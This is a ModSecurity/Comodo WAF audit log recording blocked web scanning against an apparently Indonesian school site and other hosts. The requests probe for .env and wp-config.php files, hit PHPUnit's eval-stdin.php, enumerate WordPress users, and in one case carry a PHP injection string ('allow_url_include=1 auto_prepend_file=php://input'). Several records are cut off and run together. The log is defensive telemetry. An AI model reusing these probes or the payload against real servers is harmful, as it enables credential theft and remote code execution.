Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9185033d-Z-- --39a6115e-A-- [12/May/2025:03:22:40 +0700] aCEHEE8xOExV7lPH_DmYjQAAAMk 103.236.140.4 55654 103.236.140.4 8181 --39a6115e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Mi A1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --39a6115e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39a6115e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746994960059101 12840 (- - -) Stopwatch2: 1746994960059101 12840; combined=24576, p1=248, p2=0, p3=0, p4=0, p5=12180, sr=89, sw=0, l=0, gc=12148 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39a6115e-Z-- --c4c2856d-A-- [12/May/2025:03:27:53 +0700] aCEISUEuxCpmyy5aJPnewwAAAAA 103.236.140.4 55778 103.236.140.4 8181 --c4c2856d-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 208.76.40.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.76.40.194 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --c4c2856d-C-- --c4c2856d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c4c2856d-E-- --c4c2856d-H-- Message: Access denied with code 403 (phase 2). String match " --bfac4240-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfac4240-E-- --bfac4240-H-- Message: Access denied with code 403 (phase 2). String match " --ccd3f169-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ccd3f169-E-- --ccd3f169-H-- Message: Access denied with code 403 (phase 2). String match " --c7d22e37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7d22e37-H-- Message: Access denied with code 403 (phase 2). String match " --ebc06a45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebc06a45-E-- --ebc06a45-H-- Message: Access denied with code 403 (phase 2). String match " --022e2450-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --022e2450-E-- --022e2450-H-- Message: Access denied with code 403 (phase 2). String match " --63a68709-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63a68709-H-- Message: Access denied with code 403 (phase 2). String match " --7677290a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7677290a-E-- --7677290a-H-- Message: Access denied with code 403 (phase 2). String match " --d25b2d06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d25b2d06-E-- --d25b2d06-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747011786754097 5017 (- - -) Stopwatch2: 1747011786754097 5017; combined=3189, p1=596, p2=2553, p3=0, p4=0, p5=40, sr=154, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d25b2d06-Z-- --71417524-A-- [12/May/2025:08:13:23 +0700] aCFLM34i-S7TW27OkGl82wAAAM0 103.236.140.4 47488 103.236.140.4 8181 --71417524-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 179.109.80.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 179.109.80.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --71417524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71417524-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747012403454811 2908 (- - -) Stopwatch2: 1747012403454811 2908; combined=1263, p1=459, p2=775, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71417524-Z-- --15df8b22-A-- [12/May/2025:08:26:59 +0700] aCFOYxLjIumP119c9poHmwAAABg 103.236.140.4 47570 103.236.140.4 8181 --15df8b22-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.142.108.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.142.108.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --15df8b22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15df8b22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747013219587174 3412 (- - -) Stopwatch2: 1747013219587174 3412; combined=1442, p1=468, p2=944, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15df8b22-Z-- --164ddb4d-A-- [12/May/2025:08:46:49 +0700] aCFTCell0ld2l7Li0sdFOwAAAIc 103.236.140.4 47754 103.236.140.4 8181 --164ddb4d-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 157.245.155.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 157.245.155.158 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force --164ddb4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --164ddb4d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747014409756488 909 (- - -) Stopwatch2: 1747014409756488 909; combined=329, p1=291, p2=0, p3=0, p4=0, p5=37, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --164ddb4d-Z-- --89a6166e-A-- [12/May/2025:08:54:57 +0700] aCFU8X4i-S7TW27OkGl9EwAAANI 103.236.140.4 47918 103.236.140.4 8181 --89a6166e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.191.149.249 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.191.149.249 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --89a6166e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89a6166e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747014897886786 2790 (- - -) Stopwatch2: 1747014897886786 2790; combined=1209, p1=419, p2=761, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89a6166e-Z-- --ad0e044c-A-- [12/May/2025:09:46:51 +0700] aCFhGxLjIumP119c9poH7AAAABY 103.236.140.4 48908 103.236.140.4 8181 --ad0e044c-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.189.19.19 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.189.19.19 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ad0e044c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad0e044c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747018011408244 765 (- - -) Stopwatch2: 1747018011408244 765; combined=292, p1=249, p2=0, p3=0, p4=0, p5=43, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad0e044c-Z-- --a1825b7c-A-- [12/May/2025:10:01:44 +0700] aCFkmOll0ld2l7Li0sdFmwAAAJQ 103.236.140.4 49024 103.236.140.4 8181 --a1825b7c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.163.15.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.163.15.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a1825b7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1825b7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747018904465309 3231 (- - -) Stopwatch2: 1747018904465309 3231; combined=1398, p1=459, p2=906, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1825b7c-Z-- --1ebd8030-A-- [12/May/2025:10:24:36 +0700] aCFp9H4i-S7TW27OkGl-PwAAANg 103.236.140.4 49116 103.236.140.4 8181 --1ebd8030-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 68.183.9.16 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 68.183.9.16 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --1ebd8030-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ebd8030-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747020276562577 798 (- - -) Stopwatch2: 1747020276562577 798; combined=333, p1=300, p2=0, p3=0, p4=0, p5=33, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ebd8030-Z-- --f551951b-A-- [12/May/2025:10:57:59 +0700] aCFxx34i-S7TW27OkGl_xAAAAMI 103.236.140.4 50742 103.236.140.4 8181 --f551951b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.75.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.75.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1 Accept-Charset: utf-8 --f551951b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f551951b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747022279911719 870 (- - -) Stopwatch2: 1747022279911719 870; combined=392, p1=284, p2=0, p3=0, p4=0, p5=108, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f551951b-Z-- --1d4a0176-A-- [12/May/2025:10:58:22 +0700] aCFx3hKpX3ymKhxxBshFUAAAAE8 103.236.140.4 50744 103.236.140.4 8181 --1d4a0176-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 143.198.75.147 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 143.198.75.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/2.0 (compatible; Ask Jeeves/Teoma) Accept-Charset: utf-8 --1d4a0176-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d4a0176-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747022302731234 871 (- - -) Stopwatch2: 1747022302731234 871; combined=375, p1=334, p2=0, p3=0, p4=0, p5=41, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d4a0176-Z-- --b7c90e24-A-- [12/May/2025:11:06:56 +0700] aCFz4H4i-S7TW27OkGmAgAAAAM8 103.236.140.4 52480 103.236.140.4 8181 --b7c90e24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.156.92.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.156.92.159 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --b7c90e24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7c90e24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747022816380052 717 (- - -) Stopwatch2: 1747022816380052 717; combined=321, p1=280, p2=0, p3=0, p4=0, p5=41, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7c90e24-Z-- --7480f11f-A-- [12/May/2025:11:06:57 +0700] aCFz4RKpX3ymKhxxBshFVwAAAFg 103.236.140.4 52486 103.236.140.4 8181 --7480f11f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.156.92.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.156.92.159 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --7480f11f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7480f11f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747022817106539 830 (- - -) Stopwatch2: 1747022817106539 830; combined=389, p1=351, p2=0, p3=0, p4=0, p5=38, sr=155, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7480f11f-Z-- --f0210305-A-- [12/May/2025:11:15:36 +0700] aCF16H4i-S7TW27OkGmArQAAAM8 103.236.140.4 53716 103.236.140.4 8181 --f0210305-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.206.190.67 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.206.190.67 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f0210305-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f0210305-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747023336583845 3207 (- - -) Stopwatch2: 1747023336583845 3207; combined=1412, p1=473, p2=908, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0210305-Z-- --a3f7eb3c-A-- [12/May/2025:11:22:18 +0700] aCF3eull0ld2l7Li0sdFqQAAAJY 103.236.140.4 53730 103.236.140.4 8181 --a3f7eb3c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.89.74.70 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.89.74.70 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a3f7eb3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3f7eb3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747023738692925 3008 (- - -) Stopwatch2: 1747023738692925 3008; combined=1255, p1=426, p2=797, p3=0, p4=0, p5=32, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3f7eb3c-Z-- --c8ec3c34-A-- [12/May/2025:11:50:30 +0700] aCF-FhLjIumP119c9poKQwAAAAM 103.236.140.4 54056 103.236.140.4 8181 --c8ec3c34-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 129.0.65.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 129.0.65.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c8ec3c34-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8ec3c34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747025430709874 3456 (- - -) Stopwatch2: 1747025430709874 3456; combined=1460, p1=479, p2=949, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8ec3c34-Z-- --9c6de671-A-- [12/May/2025:11:56:23 +0700] aCF_d-ll0ld2l7Li0sdF0AAAAI0 103.236.140.4 54076 103.236.140.4 8181 --9c6de671-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 138.197.152.158 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 138.197.152.158 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --9c6de671-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c6de671-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747025783153150 857 (- - -) Stopwatch2: 1747025783153150 857; combined=356, p1=317, p2=0, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c6de671-Z-- --8f46531a-A-- [12/May/2025:12:02:13 +0700] aCGA1RLjIumP119c9poKSQAAAAk 103.236.140.4 54138 